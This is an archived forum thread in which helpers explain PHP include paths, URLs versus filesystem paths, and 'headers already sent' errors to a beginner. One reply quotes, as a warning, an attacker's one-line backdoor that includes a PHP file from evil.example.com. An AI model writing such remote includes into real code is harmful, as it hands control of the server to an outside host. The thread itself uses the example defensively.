Forums

The forums ran from 2008-2020 and are now closed and viewable here as an archive.

Home Forums Back End Problems with PHP 'include'

  • This topic is empty.
Viewing 15 posts - 1 through 15 (of 19 total)
  • Author
    Posts
  • #173944
    Anonymous
    Inactive

    I am trying to include a php file into a div using the following example

    <?php include ‘http://www.yoursite.com/path/to/file.php'; ?>

    But it isn’t working. I’ve also tried

    <?php include "{$_SERVER['DOCUMENT_ROOT']}/path/to/file.php"; ?>

    And, you guessed it, nuttin’.

    Does the file to be included need the word echo after <?php or am I doing something else wrong?

    Many Thanks!

    #173945
    Senff
    Participant

    You can’t/shouldn’t include a file through HTTP that is located on a server — then it will be processed already by the server so you can’t use the code.

    Only use unprocessed files that are in the same environment, using the relative path, so never include a domain name (hardcoded or otherwise). So that would be something like:

    <?php include "/path/to/file.php"; ?>
    
    #173948
    Anonymous
    Inactive

    Greetings Senff,

    I’ve tried that without any success. I have had it like

      <div>
      &lt;?php include "/new/test/cform.php"; ?&gt;
      </div>
    

    and nothing shows within the div.

    Only use unprocessed files that are in the same environment….

    Could you expound on this please? I understand that an absolute path isn’t useful here and that a relative path is, but I’m still fuzzy as to “being processed on the server and why that renders the code useless. I’ve seen some examples that uses the absolute path, though I followed their instructions and go zilch even though others said it worked for them. I’m too green with all of this to know BS from brilliance.

    Also, I don’t know what happened to my description for this. Problems getting isn’t very descriptive and the remainder of it went who knows where. LOL

    Best Regards.

    #173954
    __
    Participant

    I understand that an absolute path isn’t useful here and that a relative path is…

    Well, an absolute path isn’t “useless.” "{$_SERVER['DOCUMENT_ROOT']}/path/to/file.php" is an absolute file path, because it starts from the root of the filesystem. A relative path starts from “somewhere else,” such as the current directory. For example, if you use include from your document root directory, then "{$_SERVER['DOCUMENT_ROOT']}/path/to/file.php" and "path/to/file.php" will both point at the same location (though "/path/to/file.php" would not).

    just to clear things up, http://example.com/path/to/file.php is not a filesystem path at all. It’s a URL.

    If "{$_SERVER['DOCUMENT_ROOT']}/path/to/file.php" is not working, then the most likely explanation is that it’s not the correct path and the file is actually stored somewhere else. Instead of putting the path directly in include, try

    $path = "{$_SERVER['DOCUMENT_ROOT']}/path/to/file.php";
    var_dump( $path );
    

    …to see what the full path is resolving to.

    Also, include will throw a warning if it can’t find (or access) the file you ask for. Check your error logs.

    Only use unprocessed files that are in the same environment

    What Senff means is that, when trying to include something (e.g., a php file) via a URL, it will often be the case that the file has already been executed on the other server: you won’t get the PHP script, but only its output (as though you requested it from a browser).

    It’s the “can’t/shouldn’t” part of his advice that is more important. It is unsafe to use include with a URL, because it allows another server control of yours. For example, if you include 'http://example.com/kittens_and_butterflies.php';, there is nothing that prevents that other server from giving you malicious_database_injection.php instead.

    Your installation of PHP should be configured to prevent URL includes entirely,* because it is also used as an attack vector: if someone breaks into your server, instead of adding a ton of malicious scripts and extra code, they’ll add only one line (which you are much less likely to notice): something like include 'http://evil.example.com/all_my_bad_scripts.php';

    * check your php.ini file, or ask your hosting company.

    #174027
    Anonymous
    Inactive

    Greetings Traq,

    I’ve tried every variation to include this form into this page (where the box with the thin black border is) and tried using

    <?php $path = “{$_SERVER[‘DOCUMENT_ROOT’]}/form-test/cform.php”;
    var_dump( $path ); ?>

    Nothing is working. Is it possible it’s a z-index thing or an alignment in the form itself that is causing the form to be included in the page to be hidden?

    Also, by “absolute path” I meant entering the complete URL, e.g. http://example.com/path/to/file.php. I know it’s not a file system path, but it is a path to a file on a server.

    Best Regards.

    #174034
    Senff
    Participant

    I’ve tried every variation to include this form into this page (where the box with the thin black border is)

    The page where you want to include the form is an HTML page, not PHP, so the PHP include code will never be executed.

    #174039
    Anonymous
    Inactive

    Aaaah, well that opens another (potential) can of nightmares. How difficult is it to convert said page to php?

    (I’m feeling dumber by the minute!)

    Best Regards.

    #174040
    Alen
    Participant

    Just change the extention, from .html to .php.

    #174078
    Anonymous
    Inactive

    Greetings Alan,

    I thought that was the way to do it, and tried that, but I also had <?php ?>wrapped around the html which was causing the problem. Being new to all of this, and having not worked with it for some time while trying to build a contact form from scratch, I had forgotten how simp0le it was and thus the question.

    I seem to remember though that <?php ?> needed to be placed within the page too?

    Best Regards.

    #174079
    Anonymous
    Inactive

    Okay, I’ve gotten the form to show in the page, but I am getting the following warnings/errors:

    Warning: session_start(): Cannot send session cookie – headers already sent by (output started at /”“/”“/”“/”“/test/index.php:1089) in /””/””/””/form-test/cform.php on line 9

    Warning: session_start(): Cannot send session cache limiter – headers already sent (output started at /”“/”“/”“/”“/test/index.php:1089) in /””/””/””/form-test/cform.php on line 9

    Warning: Cannot modify header information – headers already sent by (output started at /”“/”“/”“/”“/test/index.php:1089) in /””/””/””/form-test/cform.php on line 12

    Warning: session_start(): Cannot send session cookie – headers already sent by (output started at /”“/”“/”“/”“/test/index.php:1089) in /”“/”“/”“/”“/test/cform.php on line 9

    Warning: session_start(): Cannot send session cache limiter – headers already sent (output started at /”“/”“/”“/”“/test/index.php:1089) in /”“/”“/”“/”“/test/cform.php on line 9

    Warning: Cannot modify header information – headers already sent by (output started at /”“/”“/”“/”“/test/index.php:1089) in /”“/”“/”“/”“/test/cform.php on line 12

    Perhaps this is something that @un-traq-ed needs to look at since he built the tutorial for the form?

    My hunch is there is a conflict with the utf-8 and some html being in both the index page the cform is being included into and the cform itself?

    Thanks to any and all in advance.

    #174114
    Senff
    Participant

    You’re trying to import/include PHP code on your page that is more than just the form — in fact, it is a whole HTML page, including all its tags such as HTML, HEAD, BODY, etc.

    (go to http://www.wslmf.org/form-test/cform.php and view the source)

    That’s probably why you get the “headers already sent” message.

    What you need to do is to include just the code for the form, so the .PHP file you’re trying to include should not include any headers or such.

    Edit cform.php and remove everything that comes before and after the form (everything before <FORM and everything after </FORM>).

    #174119
    Anonymous
    Inactive

    Greetings Senff,

    There’s a lot more than just a header and other html before and after the <form> which is very important, so I’m not sure what to do. I just noticed that my @ didn’t work, so perhaps even though he changed his handle it’s still @traq? If it works and he sees the above message re the errors he’ll know what I should do/remove.

    Many thanks Senff.

    #174120
    Senff
    Participant

    You’re right, don’t delete all of it. But, just make sure there are no HTML headers in that file — there should be no <HTML> tag, no <HEAD>, no <BODY>.

    However if you feel more comfortable waiting for instructions from @traq / @un-traq-ed, feel free to do so.

    #174126
    Anonymous
    Inactive

    Senff,

    I’m just too unsure and as traq built the tutorial of the contact form I just really need him to direct me on this.

    I do greatly appreciate your input however!

    Best Regards.

    #174135
    __
    Participant

    @Senff just to bring you up to speed, here’s what we’re working with.

    @michael1961, right now, if I understand correctly, you’re including the class and building the form on one page (the cform.php page), and then trying to include that page on another page.

    What this boils down to is that we end up with some of the HTML markup generated twice (that’s the problem Senff was talking about), and —because your index page has already sent output to the browser before trying to include the contact form— starting the session doesn’t work (that’s the “headers already sent” error messages you’re getting).

    Our test page is a complete, “stand-alone” page. If you want to include the contact form as part of a different page, you can use the same PHP methods (new contactMichael1961( $_POST );, <?= $contactForm->htmlMarkup(); ?>) on that actual page.

    If you show me the contents of your index page, I’ll help you set up it up from there.

    Also, by “absolute path” I meant entering the complete URL, e.g. http://example.com/path/to/file.php. I know it’s not a file system path, but it is a path to a file on a server.

    Actually, no, that’s the misunderstanding I am trying to point out: A URL and a filesystem path are completely different things. A URL might be mapped_* to a filesystem path (e.g., by your server), but in and of themselves, they are _completely unrelated things. A filesystem locates files on your computer (server); a URL locates things (typically) over the internet.

    * a typical example: when Apache gets a request for http://example.com/path/to/file.php, it looks in its Document Root directory for a file at “path/to/file.php”. However, the actual file path is something like /users/youre-name/example.com/public-html/path/to/file.php. In other cases, the URL might have absolutely no relation to the file’s actual location (via mod_rewrite, for example), or may not refer to a file at all (maybe a DB query, for example).

    This is a huge conceptual stumbling block, for almost everyone. Because they superficially look similar, and because (many times) servers do perform a fairly literal mapping to real files, most people conclude that file paths and URLs are indeed the same thing. Problems don’t present themselves until, for one reason or another (usually include), you’re forced to understand the difference.

Viewing 15 posts - 1 through 15 (of 19 total)
  • The forum ‘Back End’ is closed to new topics and replies.